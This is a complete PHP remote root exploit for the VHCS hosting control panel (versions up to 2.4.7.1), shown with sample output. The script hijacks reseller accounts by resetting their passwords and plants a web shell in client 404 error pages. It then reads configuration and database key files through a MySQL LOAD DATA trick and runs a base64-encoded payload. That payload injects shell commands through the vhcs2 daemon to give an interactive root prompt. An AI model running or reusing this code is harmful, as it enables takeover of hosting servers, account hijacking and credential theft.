#!/usr/bin/php -q # http://acid-root.new.fr/ # #acidroot@irc.worldnet.net # # Exploit: # + Logged in (Administrator) # + The administrator has 2 resellers # / Changing dareseller's password # / Trying to connect as dareseller:thatpwnz # + Login successful # + The reseller has 2 users # + Host domaintest.fr is connected # / Trying to write PHP code # + PHP code successfully written # / We'll have to bypass open_basedir cause safe_mode=On # - User doesn't have SQL rights # / Host domaintest.fr isn't a valid user # + Host xpliamaclient.com is connected # / Trying to write PHP code # + PHP code successfully written # / We'll have to bypass open_basedir cause safe_mode=On # - User doesn't have SQL rights # / Host xpliamaclient.com isn't a valid user # / Changing unautresel's password # / Trying to connect as unautresel:thatpwnz # + Login successful # + The reseller has 1 users # + Host thegoodone.com is connected # / Trying to write PHP code # + PHP code successfully written # / We'll have to bypass open_basedir cause safe_mode=On # / Trying to create a database # + Database 92xpl_db39 successfully created # + Using database id 12 # / Trying to add SQL user # + User 93xpl_usr2 successfully created # + Using SQL user id 17 # + Host thegoodone.com is a valid user # + Logged in (thegoodone.com - Client) # / Trying to load files via local_infile # + Ok: /etc/vhcs2/vhcs2.conf # + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php # + Now you can execute commands as root =] # + root@thegoodone.com: id # # uid=0(root) gid=0(root) # class vhcs_xpl extends phpsploit { var $sleep_time = 4; # -rw-r--r-- 1 root root var $conf_path = '/etc/vhcs2/vhcs2.conf'; # -r-------- 1 www-data www-data var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php'; var $head_arr = array( 'admin/index.php' => 3, 'reseller/index.php' => 2, '../reseller/index.php' => 2, 'client/index.php' => 1, '' => 0); var $privileges = array( 3 => 'Administrator', 2 => 'Reseller', 1 => 'Client'); var $reg_arr = array( 1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) #i', 2 => '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)#i', 3 => '#delete_sql_database\.php\?id=([0-9]+)#i', 4 => '#delete_sql_database\.php\?id=([0-9]+)#i', 5 => '#sql_execute_query.php\?id=([0-9]+)#i'); var $flags = array( -1 => '-', 0 => '/', 1 => '+'); function main() { $this->agent('Mozilla Firefox'); $this->cookiejar(1); $this->mhead(); $this->uri = $this->getparam('url', TRUE); $this->url_arr = parse_url($this->uri); $this->patch = $this->getparam('patch'); $this->proxh = $this->getparam('proxhost'); $this->proxa = $this->getparam('proxauth'); if($this->proxh) $this->proxy($this->proxh); if($this->proxa) $this->proxyauth($this->proxa); print "\nExploit:"; $this->type = $this->login(); if(empty($this->type)) { if(!$this->patch) { $this->msg('A patch has been applied to this website', -1); $this->msg("See RoMaNSoFt's advisory for more details", -1); $this->msg('Try with the -patch option', -1, 1); } else $this->msg('Bad username/password', -1, 1); } $this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')', 1); $this->allowredirection(1); $this->get_vhcs_conf(); $this->exec_cmd(); return; } function getparam($param, $nec=FALSE) { global $argv; foreach($argv as $value => $key) { if($key === '-'.$param) return $argv[$value+1]; } if($nec) $this->usage(); return FALSE; } function mhead() { print "\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit"; print "\n --------------------------------------------------\n"; print "\nAbout:"; print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >"; print "\n http://acid-root.new.fr/"; print "\n #acidroot@irc.worldnet.net"; print "\n"; return; } function usage() { print "\nUsage:"; print "\n vhcsxpl.php -url [options...]\n"; print "\nOptions:"; print "\n -patch Unofficial patch applied"; print "\n -proxhost If you wanna use a proxy"; print "\n -proxauth Proxy with authentication\n"; print "\n"; exit(1); } function log_as() { $this->msg("Trying to connect as ".$this->usr.':'.$this->pwd, 0); $this->allowredirection(1); $this->post($this->uri.'chk_login.php', 'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++'); $this->redir_type = $this->get_type_by_redir(); if($this->redir_type == 0) $this->msg('Login attempt failed', -1); else $this->msg('Login successful', 1); return $this->redir_type; } function get_type_by_redir() { $this->redir_arr = parse_url($this->last_redirection); $this->allowredirection(0); return $this->head_arr[$this->redir_arr['path']]; } function login() { if($this->patch) { $this->idents = explode(':', $this->patch); list($this->usr, $this->pwd) = $this->idents; $this->type = $this->log_as(); return $this->log_as_user(); } else { $this->get($this->uri.'admin/manage_users.php'); $this->type = 3; if(ereg('add_user\.php', $this->getcontent())) return $this->log_as_user(); else return 0; } } function log_as_user() { if($this->type == 3) $this->logged_as_admin(); if($this->type == 2) $this->logged_as_reseller(); if($this->type == 1) { if(!$this->patch) return 1; else return $this->valid_user(); } else return 0; } function valid_user() { if($this->write_code()) { # open_basedir + safe_mode if($this->is_safe()) { if($this->bypass_with_db()) return 1; else return 0; } else return 1; } return 0; } function logged_as_admin() { $this->msg('Logged in ('.$this->privileges[3].')', 1); $this->get($this->uri.'admin/manage_users.php'); preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers); $this->reseller_count = count($resellers[1]); $this->msg('The administrator has '.$this->reseller_count.' resellers', 1); for($i=0; $i<$this->reseller_count; $i++) { $this->usr = $resellers[2][$i]; $this->pwd = 'thatpwnz'; if(!$this->patch) { $this->msg('Changing '.$resellers[2][$i]."'s password", 0); $this->reseller_dat = ''; $this->get($this->uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]); # only checked ip preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i', $this->getcontent(), $reseller_ips); $this->ip_count = count($reseller_ips[1]); $this->ip_dat = ''; for($j=0; $j<$this->ip_count; $j++) { $this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned'; if($j != $this->ip_count-1) $this->ip_dat .= '&'; } # Change reseller's password/mail # This is needed if it was run without -path # Because we can't click on the 'Change' button. # # pwd: thatpwnz # mail: @ohyeah.com # $this->post($this->uri.'admin/edit_reseller.php', 'username='.$resellers[2][$i].'&pass=thatpwnz&'. 'pass_rep=thatpwnz&email='.$resellers[2][$i].''. '%40ohyeah.com&nreseller_max_domain_cnt=0&nres'. 'eller_max_subdomain_cnt=0&nreseller_max_alias'. '_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'. '_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'. 'er_max_sql_user_cnt=0&nreseller_max_traffic=0'. '&nreseller_max_disk=0&'.$this->ip_dat.'&custo'. 'mer_id=&fname=&lname=&firm=&zip=&city=&countr'. 'y=&street1=&street2=&phone=&fax=&Submit=++Upd'. 'ate++&uaction=update_reseller&edit_id='. $resellers[1][$i].'&edit_username='. $resellers[2][$i]); if($this->log_as() != 2) return 0; } else { $this->allowredirection(1); $this->get($this->uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]); if($this->get_type_by_redir() != 2) return 0; } if($this->logged_as_reseller()) return 1; $this->reset('cookie'); $this->get($this->uri.'reseller/change_user_interface.php?action=go_back'); } return 0; } function logged_as_reseller() { $this->get($this->uri.'reseller/users.php'); preg_match_all($this->reg_arr[2], $this->getcontent(), $users); array_walk($users[2], 'trim'); $this->user_count = count($users[1]); $this->msg('The reseller has '.$this->user_count. ' users', 1); $this->patch = FALSE; for($i=0; $i<$this->user_count; $i++) { if($this->is_alive($users[2][$i])) { $this->usr = $users[2][$i]; $this->type = 1; $this->msg('Host '.$this->usr.' is connected', 1); $this->get($this->uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]); if($this->valid_user()) { $this->msg('Host '.$this->usr.' is a valid user', 1); return TRUE; } else $this->msg("Host ".$this->usr." isn't a valid user", 0); } else $this->msg('Host '.$users[2][$i].' seems down', -1); $this->get($this->uri.'client/change_user_interface.php?action=go_back'); } return FALSE; } function bypass_with_db() { $this->get($this->dmn_vhcs_url.'client/index.php'); if(!ereg('manage_sql.php', $this->getcontent()) and !$edit) { $this->msg("User ".$this->ur." doesn't have SQL rights", -1); return FALSE; } # No database if(!$this->got_db()) { $this->msg('Trying to create a database', 0); $this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100); # Database: ..xpl_db.. $this->post($this->dmn_vhcs_url.'client/add_sql_database.php', 'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'. 'uaction=add_db'); if($this->got_db()) $this->msg('Database '.$this->tmp_db_name.' successfully created', 1); else { $this->msg("Can't create the database ".$this->tmp_db_name, 0); return FALSE; } } # First database $this->db_id = $this->sql_db_ids[1]; $this->msg('Using database id '.$this->db_id, 1); if(!$this->got_db_user()) { $this->msg('Trying to add SQL user', 0); $this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100); # SQL user: ..xpl_usr..:xpl_pwd $this->post($this->dmn_vhcs_url.'client/sql_add_user.php', 'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'. 'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='. $this->db_id); if($this->got_db_user()) $this->msg('User '.$this->tmp_db_user.' successfully created', 1); else { $this->msg("Can't create the SQL user ".$this->tmp_db_user, 0); return FALSE; } } # First SQL user id associed with the database $this->db_user_id = $this->sql_usrs[1]; $this->msg('Using SQL user id '.$this->db_user_id, 1); return TRUE; } function got_db_user() { $this->get($this->dmn_vhcs_url.'client/manage_sql.php'); $this->content_arr = explode("\n", $this->getcontent()); $this->is_sql_db_usr = FALSE; for($i=0; $icontent_arr); $i++) { if(preg_match($this->reg_arr[4], $this->content_arr[$i], $this->sql_db_id)) { if($this->sql_db_id[1] == $this->db_id) $this->is_sql_db_usr = TRUE; else $this->is_sql_db_usr = FALSE; } if(preg_match($this->reg_arr[5], $this->content_arr[$i], $this->sql_usrs)) { if($this->is_sql_db_usr) return TRUE; } } return FALSE; } function got_db() { $this->get($this->dmn_vhcs_url.'client/manage_sql.php'); preg_match($this->reg_arr[3], $this->getcontent(), $this->sql_db_ids); if(empty($this->sql_db_ids)) return FALSE; else return TRUE; } function is_alive($domain_name) { if(gethostbyname($domain_name) != $domain_name) return TRUE; else return FALSE; } function write_code() { $this->msg('Trying to write PHP code', 0); $this->dmn_url = 'http://'.$this->usr; $this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path']; $this->get($this->dmn_url.'/errors/404/index.php'); $this->old_404 = $this->getcontent(); $this->phpc = ''; $this->new_404 = $this->phpc.$this->old_404; $this->post($this->dmn_vhcs_url.'client/error_pages.php', 'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+'); $this->exec_php('print "itworkz";'); if(ereg('itworkz', $this->getcontent())) { $this->msg('PHP code successfully written', 1); return TRUE; } else { $this->msg("Can't write PHP code", -1); return FALSE; } } function get_vhcs_conf() { if($this->safe_mode) $this->msg('Trying to load files via local_infile', 0); else $this->msg('Trying to load files via shell_exec', 0); $this->lf_conf = $this->path_content($this->conf_path); $this->lf_conf = trim($this->lf_conf, "\r"); $this->vhcs_conf = explode("\n", $this->lf_conf); $this->conf = array(); foreach($this->vhcs_conf as $this->conf_line) { # comment if(!ereg('^(\s*)#', $this->conf_line)) { $this->pos = strpos($this->conf_line, '='); $this->name = strtoupper(trim(substr($this->conf_line, 0, $this->pos))); $this->value = trim(substr($this->conf_line, $this->pos+1)); $this->conf[$this->name] = $this->value; } } $this->php_keys_code = $this->path_content($this->keys_path); return; } function path_content($path) { # open_basedir On/off # safe_mode = Off if(!$this->safe_mode) { $this->phpc = 'print shell_exec("cat '.$path.'");'; $this->exec_php($this->phpc); $this->file_content = $this->getcontent(); } # open_basedir On/Off # safe_mode = On else { $this->rand_table = rand().'tmp_hax'.rand(); $this->sql_query = "CREATE TABLE ".$this->rand_table." (content text not null); ". "LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table. " FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT". "ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,". "84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69". ",78,84)) FROM ".$this->rand_table."; DROP TABLE ". $this->rand_table; $this->sql_arr = explode(';', $this->sql_query); $this->sql_cnt = count($this->sql_arr); for($i=0; $i<$this->sql_cnt; $i++) { $this->sql_res = $this->exec_sql($this->sql_arr[$i]); if($i == $this->sql_cnt-2) $this->file_content = $this->sql_res; } } if(!$this->file_content) { $this->msg("A problem occurred while trying to read the file $path", -1); if($this->safe_mode) $this->msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2); else $this->msg("We don't have sufficient access rights to the file", -1, -2); } else $this->msg("Ok: $path", 1); return $this->file_content; } function exec_sql($query) { $this->post($this->dmn_vhcs_url.'client/sql_execute_query.php', 'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'. 'cute_query&id='.$this->db_user_id); $this->sql_result = ''; if(ereg('PWNEDCONTENT', $this->getcontent())) { $this->sql_res_arr = explode('PWNEDCONTENT', $this->getcontent()); $this->sql_result = pack('H*', $this->sql_res_arr[1]); } return $this->sql_result; } function is_safe() { $this->phpc = 'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) ' .'or !function_exists("shell_exec")) ' .'{ print "safe_mode=on"; }'; $this->exec_php($this->phpc); # open_basedir always set if(ereg('safe_mode=on', $this->getcontent())) { $this->msg("We'll have to bypass open_basedir cause safe_mode=On", 0); $this->safe_mode = TRUE; } else { $this->msg('PHP configured with default safe_mode value (Off)', 0); $this->safe_mode = FALSE; } return $this->safe_mode; } function exec_cmd() { $this->msg("Now you can execute commands as root =]", 1); $this->woot_code = 'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG' .'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh' .'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU' .'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl' .'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm' .'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ' .'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID' .'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7' .'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ' .'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo' .'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC' .'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g' .'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG' .'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ' .'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX' .'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15' .'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH' .'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt' .'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX' .'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk' .'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3' .'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl' .'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi' .'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg' .'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm' .'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg' .'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2' .'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi' .'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi' .'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu' .'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX' .'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0' .'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG' .'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn' .'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy' .'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn' .'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG' .'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0' .'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX' .'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi' .'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG' .'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0' .'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX' .'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n' .'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi' .'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N' .'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG' .'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt' .'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU' .'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL' .'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn' .'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go' .'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH' .'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu' .'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3' .'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf' .'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX' .'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf' .'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW' .'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs' .'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC' .'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg' .'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW' .'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs' .'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1' .'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv' .'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2' .'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg' .'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG' .'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj' .'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC' .'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv' .'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC' .'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg' .'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm' .'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl' .'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC' .'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9' .'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC' .'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk' .'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw' .'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy' .'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy' .'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM' .'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW' .'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v' .'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW' .'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk' .'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi' .'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg' .'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW' .'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0' .'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS' .'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy' .'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj' .'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz' .'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS' .'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy' .'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH' .'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK' .'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn' .'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg' .'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW' .'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy' .'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX' .'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf' .'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG' .'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK' .'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew' .'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg' .'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX' .'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog' .'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC' .'RsaW5lOw0KfQo/Pgo='; while($this->cmd_prompt()) { $this->exec_php('print $_SERVER["DOCUMENT_ROOT"];'); $this->tmp_file = $this->getcontent().'/'.md5(rand()); $this->set_hvar('db-host', $this->conf['DATABASE_HOST']); $this->set_hvar('db-user', $this->conf['DATABASE_USER']); $this->set_hvar('db-pass', $this->conf['DATABASE_PASSWORD']); $this->set_hvar('db-name', $this->conf['DATABASE_NAME']); $this->set_hvar('sleep-time', $this->sleep_time); $this->set_hvar('file', $this->tmp_file); $this->set_hvar('cmd', $this->cmd); $this->set_hvar('version', $this->conf['Version']); $this->set_hvar('php-keys', '?>'.$this->php_keys_code); $this->exec_php('?>'.base64_decode($this->woot_code)); print "\n".$this->getcontent(); } exit(0); } function set_hvar($name, $value) { $this->addheader('Sploit-'.$name, base64_encode($value)); return; } function cmd_prompt() { $this->msg('root@'.$this->usr.': ', 1); $this->cmd = trim(fgets(STDIN)); if(!ereg('^(quit|exit)$', $this->cmd)) return TRUE; else return FALSE; } function exec_php($php) { $this->addheader('Shell', base64_encode($php)); $this->get($this->dmn_url.'/errors/404/index.php'); return; } function msg($msg, $flag, $action=0) { print "\n ".$this->flags[$flag]."\x20".$msg; switch($action) { case 1: print "\n"; return $this->usage(); break; case 2: print "\n"; exit(1); break; } } } $spl = new vhcs_xpl; $spl->main(); ?>